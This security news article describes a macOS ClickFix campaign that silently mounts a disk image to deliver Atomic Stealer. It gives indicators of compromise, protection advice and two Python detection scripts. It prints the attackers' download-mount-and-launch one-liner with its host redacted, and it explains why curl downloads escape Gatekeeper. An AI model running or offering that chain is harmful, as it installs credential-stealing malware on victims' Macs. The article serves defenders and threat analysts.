PROBABLYPWNED
Malware | June 23, 2026 | 5 min read

macOS ClickFix Gains Silent DMG Mount to Push AMOS Stealer

Unit 42 uncovers ClickFix campaign using hdiutil -nobrowse to silently mount disk images on macOS. Victims never see the DMG—just Atomic Stealer harvesting credentials.

James Rivera

The ClickFix social engineering technique keeps evolving on macOS. Palo Alto Networks Unit 42 has identified a campaign that silently mounts malicious disk images without displaying them in Finder—making it nearly impossible for victims to notice anything happened before Atomic Stealer harvests their credentials.

The attack chains a fake CAPTCHA prompt with a Terminal command that downloads, mounts, and executes malware in a single operation. No Finder window, no visible DMG icon on the desktop. The disk image appears, deploys its payload, and the user remains unaware.

How Silent DMG Mounting Works

Traditional macOS malware delivery requires victims to manually open downloaded disk images. The new technique automates the entire process through a single Terminal command:

curl -fsSL [malicious URL] -o /tmp/s.01M0td.dmg && \
hdiutil attach -nobrowse /tmp/s.01M0td.dmg && \
open $(find /Volumes -maxdepth 3 -name "*.app" | head -1)

Breaking this down:

  1. curl -fsSL fetches the DMG quietly: -s suppresses the progress meter, -S still prints errors, -f makes HTTP errors fail instead of saving an error page, and -L follows redirects to wherever the payload is actually hosted
  2. hdiutil attach -nobrowse mounts the disk image under /Volumes without showing it on the desktop, in Finder's sidebar, or in a Finder window
  3. find locates the first .app bundle up to three directory levels below /Volumes and open launches it (the command as shown matches only .app bundles, not .pkg installers)

The -nobrowse flag is what makes the chain quiet. It is a documented hdiutil option rather than a new trick. Normally a mounted DMG shows up on the desktop and in Finder's sidebar, and Finder usually opens a window on its contents. With -nobrowse the volume is marked do-not-browse, so Finder hides it. It is still mounted under /Volumes/, still reachable by path, and still listed by mount (with nobrowse among its options), diskutil list and hdiutil info; only the user-facing cues are gone.
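As an added example (not part of the Unit 42 report or this article's own material), the following Python script lists mount points under /Volumes that carry the nobrowse option, which is what an image attached with hdiutil attach -nobrowse looks like in the output of the macOS mount command. The sample mount output embedded below is constructed for the example; the volume name /Volumes/NNApp, the device nodes and the other volumes are assumptions. On a real Mac, feed it the output of live_mount_output() instead.

```python
import re
import subprocess

# Constructed sample of `mount` output on a Mac where one DMG was attached
# normally (/Volumes/Installer, downloaded by a browser, hence quarantine) and
# one with `hdiutil attach -nobrowse` after a curl download (/Volumes/NNApp,
# no quarantine option because curl sets no quarantine attribute). Devices and
# volume names are assumptions for the example.
SAMPLE_MOUNT_OUTPUT = """\
/dev/disk3s1s1 on / (apfs, sealed, local, read-only, journaled)
devfs on /dev (devfs, local, nobrowse)
/dev/disk3s6 on /System/Volumes/VM (apfs, local, noexec, journaled, noatime, nobrowse)
/dev/disk3s5 on /System/Volumes/Data (apfs, local, journaled, nobrowse, protect)
/dev/disk5s1 on /Volumes/Installer (hfs, local, nodev, nosuid, read-only, noowners, quarantine, mounted by user)
/dev/disk6s1 on /Volumes/NNApp (hfs, local, nodev, nosuid, read-only, noowners, nobrowse, mounted by user)
"""

# `<device> on <mount point> (<comma separated options>)`; the mount point
# may contain spaces, so match it non-greedily up to the parenthesised options.
MOUNT_LINE = re.compile(r"^(?P<device>\S+) on (?P<mountpoint>.+?) \((?P<options>[^)]*)\)$")


def parse_mount(text):
    """Parse `mount` output into (device, mountpoint, set_of_options) tuples."""
    entries = []
    for line in text.splitlines():
        m = MOUNT_LINE.match(line.strip())
        if not m:
            continue
        opts = {o.strip() for o in m.group("options").split(",")}
        entries.append((m.group("device"), m.group("mountpoint"), opts))
    return entries


def hidden_user_volumes(text):
    """Return (device, mountpoint) for volumes under /Volumes that Finder hides.

    hdiutil attach -nobrowse mounts with the MNT_DONTBROWSE flag, which `mount`
    prints as the option `nobrowse`. System volumes (/dev, /System/Volumes/*)
    legitimately carry that flag, so only mount points under /Volumes/ count.
    """
    return [
        (device, mountpoint)
        for device, mountpoint, opts in parse_mount(text)
        if "nobrowse" in opts and mountpoint.startswith("/Volumes/")
    ]


def live_mount_output():
    """Run the real `mount` command (macOS); not used by the embedded sample."""
    return subprocess.run(["mount"], capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for device, mountpoint in hidden_user_volumes(SAMPLE_MOUNT_OUTPUT):
        print(f"hidden volume: {mountpoint} ({device})")
```

Run it on a live host with hidden_user_volumes(live_mount_output()); anything it prints is a volume the user cannot see in Finder, and hdiutil info will show which image file backs it.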

AMOS Payload Targets Everything

The campaign delivers Atomic macOS Stealer (AMOS), which accounted for nearly 40% of Sophos's macOS protection updates last year. Once executed, the self-signed NNApp.app bundle targets:

Browsers (8 Chromium variants + Firefox derivatives):

  • Chrome, Edge, Brave, Opera, Arc, Vivaldi, CocCoc, Yandex
  • LibreWolf, Tor Browser, Waterfox, Zen

Cryptocurrency wallets:

  • Exodus, Electrum, Atomic Wallet, Bitcoin Core
  • 7 additional wallet applications

System data:

  • Apple Keychain
  • Safari passwords and cookies
  • Telegram Desktop sessions
  • Discord tokens
  • Apple Notes
  • PDF, TXT, and RTF documents from common directories

The breadth of targeting explains why AMOS remains the dominant macOS infostealer. Similar to the Torg Grabber campaign that targeted over 700 crypto wallets, a single successful infection can compromise banking credentials, cryptocurrency holdings, two-factor authentication tokens, and personal documents in one sweep.

Bypassing macOS Protections

Apple introduced Terminal paste scanning in macOS 26.4 specifically to combat ClickFix attacks. When users paste suspicious commands into Terminal, the system now warns them before execution. Attackers responded by pivoting to Script Editor, using applescript:// URLs to bypass Terminal entirely.

This latest campaign takes yet another path. By keeping the attack within Terminal but automating everything in a single command, attackers hope victims will copy-paste before the warning can register. The command executes quickly—download, mount, and launch happen within seconds of pasting.

The NNApp.app bundle is self-signed and not notarized, which Gatekeeper would normally refuse to run. Gatekeeper, however, only assesses files that carry the com.apple.quarantine extended attribute, which browsers and other quarantine-aware downloaders set on what they save. curl sets no such attribute, so neither the DMG nor the app inside it is marked, and launching the bundle with open from Terminal never triggers the assessment. A quick triage check on a suspect image is xattr -l on the file: a curl download shows no com.apple.quarantine entry, a browser download does.

Part of a Broader ClickFix Ecosystem

This silent mounting technique joins a growing arsenal of ClickFix delivery mechanisms. Unit 42 previously documented IUAM ClickFix Generator, a web-based tool that automates the creation of deceptive phishing pages for low-skilled attackers.

The ClickFix approach has proven remarkably adaptable. We've seen it used to deploy Vidar through compromised WordPress sites, target crypto developers through OpenClaw AI agent platforms, and even mimic enterprise browser crashes to appear legitimate.

Microsoft has also warned about the cross-platform expansion of infostealers like AMOS, noting that attackers are increasingly targeting macOS as enterprises adopt Apple hardware.

Indicators of Compromise

Type          Value
Domain        vs-verificationdate[.]beer
IP Address    196.251.107[.]171
DMG Filename  s.01M0td.dmg
App Bundle    NNApp.app (self-signed)

Organizations should monitor for:

  • Outbound connections to the listed IOCs
  • hdiutil attach invoked with the -nobrowse flag from an interactive shell (in the pasted-command variant Terminal's parent is launchd, so browser ancestry of Terminal or Script Editor identifies only the URL-scheme variants)
  • Unsigned .app bundles executing from /Volumes/ paths
  • Rapid succession of curl, hdiutil, and open commands

Protection Measures

For individual Mac users:

The core defense hasn't changed: never paste commands from websites into Terminal. No legitimate service requires this. If a site claims you need to run a Terminal command to fix a problem, verify, or download—close it. Period.

Keep macOS updated. While the 26.4 paste scanning can be bypassed, it still provides friction that may give you time to recognize something is wrong.

For enterprise security teams:

Treat hdiutil attach -nobrowse as a high-priority alert rather than a hard block. Invisible mounts are rare in interactive sessions, but package managers such as Homebrew attach cask images with -nobrowse during installs, so a blanket block breaks legitimate tooling. Baseline that automation and key the rule on an interactive shell as the parent and an image file sitting in /tmp.

Monitor how Terminal and Script Editor get launched. A browser as the parent process is a strong signal for the applescript:// variants; in the pasted-command variant described here Terminal's parent is launchd, so the signal is the shell itself running curl, hdiutil and open within seconds of each other. Users don't normally paste shell pipelines from websites.

EDR tools can detect Atomic Stealer's behavioral patterns: rapid enumeration of browser profiles, Keychain access attempts, and cryptocurrency wallet file reads happening in sequence. The MacSync stealer campaign demonstrated similar detection opportunities through its aggressive credential harvesting behavior.
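As an added example (not Unit 42's detection content and not from this article), the following Python implements the monitoring rules above over process-exec telemetry: it classifies command lines into the download, hidden-mount and launch stages, reports shells whose children ran all three in order within a short window, records whether a browser sits above that shell, and separately lists every hdiutil attach -nobrowse as a lower-severity signal. The events below are constructed; PIDs, timestamps, the download URL (https://example.invalid/verify) and the volume name /Volumes/NNApp are assumptions.

```python
from dataclasses import dataclass
import shlex


@dataclass
class ProcEvent:
    ts: float       # seconds
    pid: int
    ppid: int
    cmdline: str


# Constructed telemetry modelled on what an EDR records when the article's
# one-liner is pasted into Terminal. Terminal (pid 500) was opened by the user,
# so its parent is launchd (pid 1), not a browser. A second shell performs a
# benign, visible mount for contrast. All values are assumptions.
SAMPLE_EVENTS = [
    ProcEvent(100.0, 500, 1,   "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
    ProcEvent(100.5, 501, 500, "/bin/zsh -l"),
    ProcEvent(130.0, 502, 501, "curl -fsSL https://example.invalid/verify -o /tmp/s.01M0td.dmg"),
    ProcEvent(131.2, 503, 501, "hdiutil attach -nobrowse /tmp/s.01M0td.dmg"),
    ProcEvent(131.9, 504, 501, "find /Volumes -maxdepth 3 -name *.app"),
    ProcEvent(132.0, 505, 501, "open /Volumes/NNApp/NNApp.app"),
    ProcEvent(140.0, 601, 1,   "/bin/zsh"),
    ProcEvent(141.0, 602, 601, "hdiutil attach /Users/admin/Downloads/Xcode.dmg"),
]

ORDER = ("download", "hidden_mount", "launch_from_volume")
WINDOW_SECONDS = 60.0
BROWSERS = {"Safari", "Google Chrome", "firefox", "Brave Browser", "Microsoft Edge"}


def classify(cmdline):
    """Map one command line to a stage of the chain, or None if it is not one."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        argv = cmdline.split()
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    if prog == "curl" and any(a.lower().endswith(".dmg") for a in argv[1:]):
        return "download"
    if prog == "hdiutil" and "attach" in argv and "-nobrowse" in argv:
        return "hidden_mount"
    if prog == "open" and any(a.startswith("/Volumes/") for a in argv[1:]):
        return "launch_from_volume"
    return None


def ancestors(events, pid):
    """Command lines of pid's parent, grandparent, ... as far as telemetry reaches."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid and by_pid[pid].ppid in by_pid:
        pid = by_pid[pid].ppid
        chain.append(by_pid[pid].cmdline)
    return chain


def browser_in_ancestry(events, pid):
    """True when any ancestor executable is a known browser (URL-scheme variants)."""
    return any(c.rsplit("/", 1)[-1] in BROWSERS for c in ancestors(events, pid))


def detect_chains(events, window=WINDOW_SECONDS):
    """Shells whose children ran download, hidden mount and launch, in that
    order, within `window` seconds; one alert per shell."""
    by_parent = {}
    for ev in sorted(events, key=lambda e: e.ts):
        stage = classify(ev.cmdline)
        if stage:
            by_parent.setdefault(ev.ppid, []).append((stage, ev))
    alerts = []
    for ppid, staged in by_parent.items():
        matched = []
        for stage, ev in staged:
            if stage == ORDER[len(matched)]:   # next expected stage only
                matched.append(ev)
                if len(matched) == len(ORDER):
                    break
        if len(matched) == len(ORDER) and matched[-1].ts - matched[0].ts <= window:
            alerts.append({
                "shell_pid": ppid,
                "pids": [e.pid for e in matched],
                "span_seconds": round(matched[-1].ts - matched[0].ts, 1),
                "browser_ancestor": browser_in_ancestry(events, ppid),
            })
    return alerts


def hidden_mounts(events):
    """Lower-severity signal: every hdiutil attach -nobrowse, chain or not."""
    return [e.pid for e in events if classify(e.cmdline) == "hidden_mount"]


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print("ClickFix DMG chain:", alert)
    print("hidden mounts (review):", hidden_mounts(SAMPLE_EVENTS))
```

The benign shell trips neither rule: its hdiutil call has no -nobrowse and is never followed by an open from /Volumes. The alert for the malicious shell carries browser_ancestor False, which is the expected value for a pasted command and is why the sequence, not the parentage, is the primary signal for this variant.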

The Cat-and-Mouse Continues

Apple blocks one execution path, attackers find another. This has been the pattern throughout 2026. Terminal paste scanning led to Script Editor abuse. Script Editor scrutiny may lead to yet another vector—perhaps osascript, Automator workflows, or something else entirely.

The underlying vulnerability isn't technical. It's the willingness of users to follow instructions from untrusted sources. Until that changes, ClickFix will remain effective regardless of which macOS utility attackers abuse next.
